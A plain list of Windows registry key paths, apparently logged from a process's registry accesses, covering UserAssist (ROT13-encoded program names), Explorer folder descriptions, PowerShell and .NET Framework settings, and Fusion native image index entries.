HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FbhaqErpbeqre.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zboflap.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Jvaqbjf AG\Npprffbevrf\jbeqcnq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{QNN168QR-4306-P8OP-8P11-O596240OQQRQ}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\puneznc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\qsethv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pyrnazte.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{P804OON7-SN5S-POS7-8O55-2096R5S972PO}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfvasb32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\efgehv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zvtjvm\cbfgzvt.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zvtjvm\zvtjvm.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\FuncrPbyyrpgbe.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\GnoGvc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Jvaqbjf Wbheany\Wbheany.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JvaqbjfCbjreFuryy\i1.0\CbjreFuryy_VFR.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\CbjreFuryy_VFR.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pbzrkc.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{8NOQ94SO-R7Q6-84N6-N997-P918RQQR0NR5}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\bqopnq32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{OO044OSQ-25O7-2SNN-22N8-6371N93R0456}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\vfpfvpcy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\ZqFpurq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{8NN47365-O2O3-1961-69RO-S866R376O12S}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\cevagznantrzrag.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{OQ3S924R-55SO-N1ON-9QR6-O50S9S2460NP}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfpbasvt.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JS.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{15067OP1-P5N8-425R-37P6-SN0O891674S9}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\erpqvfp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfen.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\\x01ko'OIs!!!!!!!!!ZXXFxBssvprQvtvgnyFSvyrf<
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\ZFGBER.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\\x01ko'OIs!!!!!!!!!ZXXFxFrgYnathntrSvyrf<
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\\x01ko'OIs!!!!!!!!!ZXXFxJkcSvyrf<
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\BVF.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Pbzzba Svyrf\zvpebfbsg funerq\BSSVPR14\Bssvpr Frghc Pbagebyyre\cebzb.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{53123611-QN37-S8QN-SNP9-03R76QO9Q64Q}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Clguba27\clguba.rkr
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Recent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_JumpListItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_JumpListItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine\PowerShellVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine\RuntimeVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine\ConsoleHostAssemblyName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\index169\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\index169\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,AMD64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\MVID
